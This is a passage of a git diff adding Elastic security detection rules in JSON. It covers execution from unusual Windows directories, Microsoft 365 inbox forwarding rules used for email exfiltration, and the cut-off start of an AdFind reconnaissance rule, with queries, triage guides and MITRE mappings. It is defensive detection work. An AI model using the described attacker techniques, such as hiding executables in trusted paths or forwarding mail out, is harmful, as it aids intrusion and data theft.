Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* add suspicious execution paths here */\n process.executable : (\n \"?:\\\\PerfLogs\\\\*.exe\", \"?:\\\\Users\\\\Public\\\\*.exe\", \"?:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"?:\\\\Intel\\\\*.exe\", \"?:\\\\AMD\\\\Temp\\\\*.exe\", \"?:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\n \"?:\\\\Windows\\\\Branding\\\\*.exe\", \"?:\\\\Windows\\\\csc\\\\*.exe\", \"?:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\n \"?:\\\\Windows\\\\en-US\\\\*.exe\", \"?:\\\\Windows\\\\wlansvc\\\\*.exe\", \"?:\\\\Windows\\\\Prefetch\\\\*.exe\",\n \"?:\\\\Windows\\\\Fonts\\\\*.exe\", \"?:\\\\Windows\\\\diagnostics\\\\*.exe\", \"?:\\\\Windows\\\\TAPI\\\\*.exe\",\n \"?:\\\\Windows\\\\INF\\\\*.exe\", \"?:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\", \"?:\\\\windows\\\\tracing\\\\*.exe\",\n \"?:\\\\windows\\\\IME\\\\*.exe\", \"?:\\\\Windows\\\\Performance\\\\*.exe\", \"?:\\\\windows\\\\intel\\\\*.exe\",\n \"?:\\\\windows\\\\ms\\\\*.exe\", \"?:\\\\Windows\\\\dot3svc\\\\*.exe\", \"?:\\\\Windows\\\\panther\\\\*.exe\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.exe\", \"?:\\\\Windows\\\\OCR\\\\*.exe\", \"?:\\\\Windows\\\\appcompat\\\\*.exe\",\n \"?:\\\\Windows\\\\apppatch\\\\*.exe\", \"?:\\\\Windows\\\\addins\\\\*.exe\", \"?:\\\\Windows\\\\Setup\\\\*.exe\",\n \"?:\\\\Windows\\\\Help\\\\*.exe\", \"?:\\\\Windows\\\\SKB\\\\*.exe\", \"?:\\\\Windows\\\\Vss\\\\*.exe\",\n \"?:\\\\Windows\\\\Web\\\\*.exe\", \"?:\\\\Windows\\\\servicing\\\\*.exe\", \"?:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"?:\\\\Windows\\\\Logs\\\\*.exe\", \"?:\\\\Windows\\\\WaaS\\\\*.exe\", \"?:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.exe\", \"?:\\\\Windows\\\\PLA\\\\*.exe\", \"?:\\\\Windows\\\\Migration\\\\*.exe\",\n \"?:\\\\Windows\\\\debug\\\\*.exe\", \"?:\\\\Windows\\\\Cursors\\\\*.exe\", \"?:\\\\Windows\\\\Containers\\\\*.exe\",\n \"?:\\\\Windows\\\\Boot\\\\*.exe\", \"?:\\\\Windows\\\\bcastdvr\\\\*.exe\", \"?:\\\\Windows\\\\assembly\\\\*.exe\",\n \"?:\\\\Windows\\\\TextInput\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\SchCache\\\\*.exe\", \"?:\\\\Windows\\\\Resources\\\\*.exe\", \"?:\\\\Windows\\\\rescache\\\\*.exe\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.exe\", \"?:\\\\Windows\\\\PrintDialog\\\\*.exe\", \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\n \"?:\\\\Windows\\\\media\\\\*.exe\", \"?:\\\\Windows\\\\Globalization\\\\*.exe\", \"?:\\\\Windows\\\\L2Schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.exe\", \"?:\\\\Windows\\\\ModemLogs\\\\*.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\"\n ) and\n \n not process.name : (\n \"SpeechUXWiz.exe\", \"SystemSettings.exe\", \"TrustedInstaller.exe\",\n \"PrintDialog.exe\", \"MpSigStub.exe\", \"LMS.exe\", \"mpam-*.exe\"\n ) and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_110.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_110.json new file mode 100644 index 00000000000..0fd0a5d89f3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_110.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Execution from an Unusual Directory", + "note": "## Triage and analysis\n\n### Investigating Process Execution from an Unusual Directory\n\nThis rule identifies processes that are executed from suspicious default Windows directories. Adversaries may abuse this technique by planting malware in trusted paths, making it difficult for security analysts to discern if their activities are malicious or take advantage of exceptions that may apply to these paths.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes, examining their executable files for prevalence, location, and valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine arguments and working directory to determine the program's source or the nature of the tasks it is performing.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of executable and signature conditions.\n\n### Related Rules\n\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Execution from Unusual Directory - Command Line - cff92c41-2225-4763-b4ce-6f71e5bda5e6\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* add suspicious execution paths here */\n process.executable : (\n \"?:\\\\PerfLogs\\\\*.exe\", \"?:\\\\Users\\\\Public\\\\*.exe\", \"?:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"?:\\\\Intel\\\\*.exe\", \"?:\\\\AMD\\\\Temp\\\\*.exe\", \"?:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\n \"?:\\\\Windows\\\\Branding\\\\*.exe\", \"?:\\\\Windows\\\\csc\\\\*.exe\", \"?:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\n \"?:\\\\Windows\\\\en-US\\\\*.exe\", \"?:\\\\Windows\\\\wlansvc\\\\*.exe\", \"?:\\\\Windows\\\\Prefetch\\\\*.exe\",\n \"?:\\\\Windows\\\\Fonts\\\\*.exe\", \"?:\\\\Windows\\\\diagnostics\\\\*.exe\", \"?:\\\\Windows\\\\TAPI\\\\*.exe\",\n \"?:\\\\Windows\\\\INF\\\\*.exe\", \"?:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\", \"?:\\\\windows\\\\tracing\\\\*.exe\",\n \"?:\\\\windows\\\\IME\\\\*.exe\", \"?:\\\\Windows\\\\Performance\\\\*.exe\", \"?:\\\\windows\\\\intel\\\\*.exe\",\n \"?:\\\\windows\\\\ms\\\\*.exe\", \"?:\\\\Windows\\\\dot3svc\\\\*.exe\", \"?:\\\\Windows\\\\panther\\\\*.exe\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.exe\", \"?:\\\\Windows\\\\OCR\\\\*.exe\", \"?:\\\\Windows\\\\appcompat\\\\*.exe\",\n \"?:\\\\Windows\\\\apppatch\\\\*.exe\", \"?:\\\\Windows\\\\addins\\\\*.exe\", \"?:\\\\Windows\\\\Setup\\\\*.exe\",\n \"?:\\\\Windows\\\\Help\\\\*.exe\", \"?:\\\\Windows\\\\SKB\\\\*.exe\", \"?:\\\\Windows\\\\Vss\\\\*.exe\",\n \"?:\\\\Windows\\\\Web\\\\*.exe\", \"?:\\\\Windows\\\\servicing\\\\*.exe\", \"?:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"?:\\\\Windows\\\\Logs\\\\*.exe\", \"?:\\\\Windows\\\\WaaS\\\\*.exe\", \"?:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.exe\", \"?:\\\\Windows\\\\PLA\\\\*.exe\", \"?:\\\\Windows\\\\Migration\\\\*.exe\",\n \"?:\\\\Windows\\\\debug\\\\*.exe\", \"?:\\\\Windows\\\\Cursors\\\\*.exe\", \"?:\\\\Windows\\\\Containers\\\\*.exe\",\n \"?:\\\\Windows\\\\Boot\\\\*.exe\", \"?:\\\\Windows\\\\bcastdvr\\\\*.exe\", \"?:\\\\Windows\\\\assembly\\\\*.exe\",\n \"?:\\\\Windows\\\\TextInput\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\SchCache\\\\*.exe\", \"?:\\\\Windows\\\\Resources\\\\*.exe\", \"?:\\\\Windows\\\\rescache\\\\*.exe\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.exe\", \"?:\\\\Windows\\\\PrintDialog\\\\*.exe\", \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\n \"?:\\\\Windows\\\\media\\\\*.exe\", \"?:\\\\Windows\\\\Globalization\\\\*.exe\", \"?:\\\\Windows\\\\L2Schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.exe\", \"?:\\\\Windows\\\\ModemLogs\\\\*.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\"\n ) and\n \n not process.name : (\n \"SpeechUXWiz.exe\", \"SystemSettings.exe\", \"TrustedInstaller.exe\",\n \"PrintDialog.exe\", \"MpSigStub.exe\", \"LMS.exe\", \"mpam-*.exe\"\n ) and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103.json new file mode 100644 index 00000000000..36a8192039c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Inbox Forwarding Rule Created", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Collection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105.json new file mode 100644 index 00000000000..ef3d1aef62f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Inbox Forwarding Rule Created", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Collection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206.json new file mode 100644 index 00000000000..c49ebb3e604 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Inbox Forwarding Rule Created", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Collection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_110.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_110.json new file mode 100644 index 00000000000..f1a9d9176cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_110.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For 